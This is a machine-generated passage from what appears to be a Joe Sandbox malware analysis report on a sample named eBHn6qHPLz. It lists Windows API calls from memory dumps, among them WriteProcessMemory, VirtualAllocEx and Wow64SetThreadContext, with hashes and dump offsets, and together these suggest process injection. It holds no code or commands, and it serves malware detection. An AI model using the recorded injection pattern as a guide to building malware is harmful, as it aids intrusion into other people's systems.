                                                                                                • Instruction Fuzzy Hash: 6E215CB19003599FCB10DFA9C880BDEBBF5FF48310F10842DE958A7251C774A554CBA4
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04C0F430
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 533135d3dccf6ac2b679ec3290e6cc5b6d9d3dcf3cb406783bc1c2fde9abde32
                                                                                                • Instruction ID: 0933a04f1cacc703fc9032f1ea77c74b5918abff830322d3f4c5d52044530eca
                                                                                                • Opcode Fuzzy Hash: 533135d3dccf6ac2b679ec3290e6cc5b6d9d3dcf3cb406783bc1c2fde9abde32
                                                                                                • Instruction Fuzzy Hash: C72127B19003599FDB10CFA9C885BDEBBF5FF48320F108429E958A7250C778A984CBA5
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EECDE7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1858586945.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 5283f4a66c59ff79596c0f37bdd843e6242c96339966da245b6d3e33a66e6ba3
                                                                                                • Instruction ID: 5859511717f8d6642d7684eea00ecf4bad6f25b810e620edf3ff6c770db6bf17
                                                                                                • Opcode Fuzzy Hash: 5283f4a66c59ff79596c0f37bdd843e6242c96339966da245b6d3e33a66e6ba3
                                                                                                • Instruction Fuzzy Hash: 5721D2B5900248AFDB10CF9AD984ADEBFF4EB48324F14842AE958A7250D375A945CFA4
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04C0EB7E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: 9b61706372a2366e8bf96cd10dc7298c50382658b8faf1a9070dde8ac831395c
                                                                                                • Instruction ID: 6c52c0a703276185a0a361f83990e7e26aa49d73b06faaa944cf1cff72be0c95
                                                                                                • Opcode Fuzzy Hash: 9b61706372a2366e8bf96cd10dc7298c50382658b8faf1a9070dde8ac831395c
                                                                                                • Instruction Fuzzy Hash: FF2157B19003098FDB10DFA9C481BEEBBF4AF48324F10882AD459A7240C738A984CFA5
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04C0EB7E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: e5b99ad1d345905e367c2dca16dcdafec8b3a6e7d2e1c82583f521e0e5c280d9
                                                                                                • Instruction ID: c41ade15048c5599d20d83c7c47945ec990790f814e73e6ed04dcdc32313ac22
                                                                                                • Opcode Fuzzy Hash: e5b99ad1d345905e367c2dca16dcdafec8b3a6e7d2e1c82583f521e0e5c280d9
                                                                                                • Instruction Fuzzy Hash: 052129B19003098FDB10DFAAC4857EEBBF5EF48324F14C429D459A7240D778A945CFA5
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EECDE7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1858586945.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 86ed33e169a953beffa204ddbefd6b7f84b23b67632c81b6820037ace5d48eaa
                                                                                                • Instruction ID: d400c5802c36de66071651f5758de037d0b6f6fc31e5cf5cef7851af8a1621e6
                                                                                                • Opcode Fuzzy Hash: 86ed33e169a953beffa204ddbefd6b7f84b23b67632c81b6820037ace5d48eaa
                                                                                                • Instruction Fuzzy Hash: 5921E4B5900248DFDB10CF9AD984ADEBFF4FB48320F14841AE918A3350D375A940CFA4
                                                                                                APIs
                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0662DCB4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891664630.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6620000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: f19d8d292edb5c4951f0bb4c384c02a3d2e8b5ee1a6e17609a68d15576d4a962
                                                                                                • Instruction ID: d33876a5b419077ab310af4e218c70c3c24e34cc2549ff5a35c7f8fffa806501
                                                                                                • Opcode Fuzzy Hash: f19d8d292edb5c4951f0bb4c384c02a3d2e8b5ee1a6e17609a68d15576d4a962
                                                                                                • Instruction Fuzzy Hash: 231106B1D002499FCB10DFAAC844ADEFBF4FF48320F14842AD559A7250C775A944CFA5
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04C0F16E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: fd22353c44c58610e11a44370ef77ecec69814235a4900d4f670363a4ef12b94
                                                                                                • Instruction ID: 3dcd1c3c0fb1ce4fc851648820a754ff343e16dc72c1547d60d637885c30c8af
                                                                                                • Opcode Fuzzy Hash: fd22353c44c58610e11a44370ef77ecec69814235a4900d4f670363a4ef12b94
                                                                                                • Instruction Fuzzy Hash: 9D1167B19002499FDB20CFA9C804BDFBFF5EF48320F108419E469A7250C775A540CBA0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 7bc461420696faa29fc9947a5a7b0e9d7080ca903db9773b1d859c7dd3334d6e
                                                                                                • Instruction ID: dd9a4e5199faa3151d58160ac8d715cdd400d354be483b2cee7b26085a2a5fa5
                                                                                                • Opcode Fuzzy Hash: 7bc461420696faa29fc9947a5a7b0e9d7080ca903db9773b1d859c7dd3334d6e
                                                                                                • Instruction Fuzzy Hash: B01149B19002598FDB10DFAAC444BEFFFF8EB88324F14842ED459A7250CB35A944CBA4
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: d8e04b2617705ca06bf503582c8223aa61fc97be96894e6b69193d1943d1c05c
                                                                                                • Instruction ID: 560d20ecc7e45c76f8f45ac905ded2212d2e842d2d8b16f1db6b22f179c58839
                                                                                                • Opcode Fuzzy Hash: d8e04b2617705ca06bf503582c8223aa61fc97be96894e6b69193d1943d1c05c
                                                                                                • Instruction Fuzzy Hash: 0D1149B1D002598FDB10DFAAC4457EEFBF5EF88324F24842AD459A7250CB34A945CBA5
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04C0F16E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 01ebfde1329de5691996c7efbeebe2cb88973d0bc2ae36c7c61641d485a77d1d
                                                                                                • Instruction ID: e9265314c5be60a204a939ce8a9d8ab55fe1382e43abcc0a4aebf05323b049db
                                                                                                • Opcode Fuzzy Hash: 01ebfde1329de5691996c7efbeebe2cb88973d0bc2ae36c7c61641d485a77d1d
                                                                                                • Instruction Fuzzy Hash: 341167B19002499FCB20DFAAC844BDFBFF5EF88320F108419E519A7250C775A940CFA0
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00EEA6DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1858586945.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: 3913fe06f358585b7c7d70e5c7fef3915bb288cefef04646e5150348be715006
                                                                                                • Instruction ID: 84650a54f3e6cc32b4658dcde551aad5f62887cd5f224be62de6adeaa94b00ae
                                                                                                • Opcode Fuzzy Hash: 3913fe06f358585b7c7d70e5c7fef3915bb288cefef04646e5150348be715006
                                                                                                • Instruction Fuzzy Hash: 6C1110B5C002498FCB10CF9AC444ADEFBF4EB89324F19842AD428B7210C379A545CFA5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq
                                                                                                • API String ID: 0-149360118
                                                                                                • Opcode ID: 86d587d355a8d6035db043b76560711bee566c61aa32e9eb375cae36da3a5634
                                                                                                • Instruction ID: 2cfd90116f2411fdcdcaa5422cd8174b90954269c84b1a744d7b823f9d6fe956
                                                                                                • Opcode Fuzzy Hash: 86d587d355a8d6035db043b76560711bee566c61aa32e9eb375cae36da3a5634
                                                                                                • Instruction Fuzzy Hash: A7A1C1317042049FDB159F68C954E6ABBB7FF88314F1584A9E50A8F7A1CB32EC12DB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: b6c38df3ec6536b8e6760944a47fc4bef416fcf508706f299c3eed8c9e36f07a
                                                                                                • Instruction ID: 8f4639bdd290563c82a46a039ea3e369f707d96b8148ba884b1049c1960d8b4b
                                                                                                • Opcode Fuzzy Hash: b6c38df3ec6536b8e6760944a47fc4bef416fcf508706f299c3eed8c9e36f07a
                                                                                                • Instruction Fuzzy Hash: A3A1F934A10218DFDB04EFA4D898A9DBBB2FF89310F158569E406AB360DB71AC56CB50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq
                                                                                                • API String ID: 0-149360118
                                                                                                • Opcode ID: eede5965d02a662e5e0c7a6f39117c9b06b551f32660dec4ff99515ec356bcc5
                                                                                                • Instruction ID: b5de5eaa77cc3d11b0dcc79834c1b5fc513968ca7b32c75025e9c04aa574b9e9
                                                                                                • Opcode Fuzzy Hash: eede5965d02a662e5e0c7a6f39117c9b06b551f32660dec4ff99515ec356bcc5
                                                                                                • Instruction Fuzzy Hash: 61719734B046148FDB14EF64C494AADB7B2FF89304F5089A9E4069B3A4DF34BD56CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: 97b10c31a1cce0c8a1cb8258fb9e9638c2a404d89bc82f7415d8c6372bde4b39
                                                                                                • Instruction ID: 26ed47af81b60155b2a05d33e6519e84f51a9e6073b197da846b300ad8ace1bd
                                                                                                • Opcode Fuzzy Hash: 97b10c31a1cce0c8a1cb8258fb9e9638c2a404d89bc82f7415d8c6372bde4b39
                                                                                                • Instruction Fuzzy Hash: F7419330B142148FDB14BB64D494AAEB7BBEFC9700F104869E402AB7A4DF74AC16DB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,bq
                                                                                                • API String ID: 0-2474004448
                                                                                                • Opcode ID: ab8046d436e961456e5eb13d979b4c8b254be1507f27cf9d750d252698063963
                                                                                                • Instruction ID: 7b59539eb2b46ba935e553b471f0c5e1e46e9c02981569b565b00c0a1f4ea7c9
                                                                                                • Opcode Fuzzy Hash: ab8046d436e961456e5eb13d979b4c8b254be1507f27cf9d750d252698063963
                                                                                                • Instruction Fuzzy Hash: CD4168357011158FCB04EF69C954AAEBBF2EF89310F258069E905DB361DB31ED46CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: e19fe18dca1ec219f65adc746717c907903b492aaee35da97303928db12f2238
                                                                                                • Instruction ID: ba0a9e12bbb8476a2d7bf669c75e8e110f29f1c5133c946e685a2bd637e22d12
                                                                                                • Opcode Fuzzy Hash: e19fe18dca1ec219f65adc746717c907903b492aaee35da97303928db12f2238
                                                                                                • Instruction Fuzzy Hash: A231A536A00104DFCF059FA4C994A99BFB2FF8C320F1544A9E505AB375DA31EC16DBA0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: 63b8587c0884fbd4a572921854be024831b89570a460dc6469ab8ad514f43c6d
                                                                                                • Instruction ID: 15fddbf6d2a2e0d9366e1dd842a9e4e263c3a42f94ef0cb5bc549f153dae4f31
                                                                                                • Opcode Fuzzy Hash: 63b8587c0884fbd4a572921854be024831b89570a460dc6469ab8ad514f43c6d
                                                                                                • Instruction Fuzzy Hash: 8021A331B001049FCF059FA5C994E59BBB7FF8C320B1544A8E50A9B375DA32EC12CBA0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: 5ae48f0aa23f81538742880a9ce9674a2f0c1e4c6ba3c54d7899cf116ac0549e
                                                                                                • Instruction ID: b50a34c9d177fad7b3536227d67e8ef05764c625cfcac40510281f43c9b33475
                                                                                                • Opcode Fuzzy Hash: 5ae48f0aa23f81538742880a9ce9674a2f0c1e4c6ba3c54d7899cf116ac0549e
                                                                                                • Instruction Fuzzy Hash: CA21D630B002088BDB14AF65D8646BEBBBBAFC9B00F104469E406EB390DF746C16DB51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: p<^q
                                                                                                • API String ID: 0-1680888324
                                                                                                • Opcode ID: e3508d40f406c76234702bd2e2e9a92b60daa0a937df984ab158061ebffeaba1
                                                                                                • Instruction ID: 9a8ca0d2a4d69b8d2e1f859ebbf3546106f91ded28069bd446aadd9452c1ecfd
                                                                                                • Opcode Fuzzy Hash: e3508d40f406c76234702bd2e2e9a92b60daa0a937df984ab158061ebffeaba1
                                                                                                • Instruction Fuzzy Hash: FA2149313042549FCB16CF6EC854AAA7BEAEF89310B058095FD59CB361CA31EC61CB20
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: p<^q
                                                                                                • API String ID: 0-1680888324
                                                                                                • Opcode ID: c89bddfe2d3170ee7739cabe2808cb0989c51abe4d12f1a47e9c4c7d4eb9695e
                                                                                                • Instruction ID: dd2a382cee39c0355fb58e9629f14f937e60eb67f3a6b92f040fb394c718a439
                                                                                                • Opcode Fuzzy Hash: c89bddfe2d3170ee7739cabe2808cb0989c51abe4d12f1a47e9c4c7d4eb9695e
                                                                                                • Instruction Fuzzy Hash: F3214C713041549FDB16CF6EC840AAA7BEAEF89310F094095FC59CB361CA35EC61CB60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,bq
                                                                                                • API String ID: 0-2474004448
                                                                                                • Opcode ID: 3dda6d8816be427a027d57fcfdd017631456af8db56b36307792038859b14472
                                                                                                • Instruction ID: 3a891a6363527ffa0363cc92f3a9f0b1a3bc4c91d399ccf2ece411bb321002da
                                                                                                • Opcode Fuzzy Hash: 3dda6d8816be427a027d57fcfdd017631456af8db56b36307792038859b14472
                                                                                                • Instruction Fuzzy Hash: 60119D35B011199FCB04EF69C984A6EBBF6EF85311F258065E901DB361DB31EC01CB90
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0662F093
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891664630.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6620000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 5b1c32f0e0766b4e78583de8be5abc62dc32748f9365572c95d85765de6579fe
                                                                                                • Instruction ID: 8920edd80d364e2f67a50958059306d6405c34907e16a45d3b52eff92be3b895
                                                                                                • Opcode Fuzzy Hash: 5b1c32f0e0766b4e78583de8be5abc62dc32748f9365572c95d85765de6579fe
                                                                                                • Instruction Fuzzy Hash: 421134B19002499FCB20DFAAC844BEFFBF5EB88320F248819D559A7250CB75A544CFA4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Q
                                                                                                • API String ID: 0-3463352047
                                                                                                • Opcode ID: 8e49f80c290236598af0fed77aef7c42119d33cf1adea26084fef9ea4cb4933e
                                                                                                • Instruction ID: e2a9196708fdb28c79a7d9671e5638d925bd070a996518f67072c1e1c326793e
                                                                                                • Opcode Fuzzy Hash: 8e49f80c290236598af0fed77aef7c42119d33cf1adea26084fef9ea4cb4933e
                                                                                                • Instruction Fuzzy Hash: BFF0AFB0D2221CCFDB85EFA8D988B9DBBF1BF08309F0004AAA409AB255D7705A41CF41
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1891473246.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6470000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C
                                                                                                • API String ID: 0-1037565863
                                                                                                • Opcode ID: 11a84e7528c9706b456f01ddb665facdbdb628d65a9a72c16f670517161342d9
                                                                                                • Instruction ID: 8c84b4d3cea03a73f5520f0ac09c4928a8a00b4a8c5afc3eccaf024950570679
                                                                                                • Opcode Fuzzy Hash: 11a84e7528c9706b456f01ddb665facdbdb628d65a9a72c16f670517161342d9
                                                                                                • Instruction Fuzzy Hash: B7E092B4812228CFDB5ACF64C894BDEBBB5FB04708F50119AD50872241C7755B85CE45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3ee5e4608da59d81bd4bc492680c69d34cd89fba83b2c486724a56c3763738ab
                                                                                                • Instruction ID: feb7cb3265d40bccfcffc42d8f106d2708908d3b27b78627c31a2d15c7ef68fa
                                                                                                • Opcode Fuzzy Hash: 3ee5e4608da59d81bd4bc492680c69d34cd89fba83b2c486724a56c3763738ab
                                                                                                • Instruction Fuzzy Hash: A1120B34A042188FDB14EF64C894A9DBBB2FF89304F5085A8D54AAB365DF30ED95CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 43a6b0775a662bb37fadc57755c13c344146676515988529c3757d7c4d635bfa
                                                                                                • Instruction ID: f55c46caec0f5d94bbdb1b32d61aee152bdaccf7c2f0321f14c81de9f2be234d
                                                                                                • Opcode Fuzzy Hash: 43a6b0775a662bb37fadc57755c13c344146676515988529c3757d7c4d635bfa
                                                                                                • Instruction Fuzzy Hash: E2E1CC31B042049FDB04DF69C485B6DBBE2EB84314F1884A9E805AF392DBB6ED55CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 04ed07d398ada9a8f57f5eb84cf46eb72484e53ddaa50d9206c836b54bb5f40c
                                                                                                • Instruction ID: 742b2fca0d114e8da7b70cbb0a34e8d924dc6049148d305ef3754ff1237b0824
                                                                                                • Opcode Fuzzy Hash: 04ed07d398ada9a8f57f5eb84cf46eb72484e53ddaa50d9206c836b54bb5f40c
                                                                                                • Instruction Fuzzy Hash: 56919935B052099FCB14DFA5D958AADBBB2FF88311F1484A9E801EB391CB35ED51CB60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d4e6ff4c94e9856480476db9190309924f715a257ab6544b4357e0b8ad4b4352
                                                                                                • Instruction ID: 9b9914b1d5761c646ecfdebfe9ed219fb6b6fccda5a319e86bc58177dea6a016
                                                                                                • Opcode Fuzzy Hash: d4e6ff4c94e9856480476db9190309924f715a257ab6544b4357e0b8ad4b4352
                                                                                                • Instruction Fuzzy Hash: CFA1F534B002188FDB14DF24C994BA9BBB6BF89304F5085A8E54AAB365DF30ED95CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ef21f0ab512c98843cb458d6e333b3db3a9e077ed1d03b75c43baf4e93a332c1
                                                                                                • Instruction ID: e669d58d8ab2e2b864728f096f260b0021c762391edbd063797fe8fd2d9a0a96
                                                                                                • Opcode Fuzzy Hash: ef21f0ab512c98843cb458d6e333b3db3a9e077ed1d03b75c43baf4e93a332c1
                                                                                                • Instruction Fuzzy Hash: 36A1BD30E052298FDF11DFA5DA41AEDBBF1FF08304F149059E812A7295EB38A956CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: febb1d30a643f44ec1025e79151842334a1595e810ee9b5075c7e6aed4e6527b
                                                                                                • Instruction ID: bf095dba6a490c67e8f717241867372a8dfbdf49b5894ccc9d4a4dd8805c1992
                                                                                                • Opcode Fuzzy Hash: febb1d30a643f44ec1025e79151842334a1595e810ee9b5075c7e6aed4e6527b
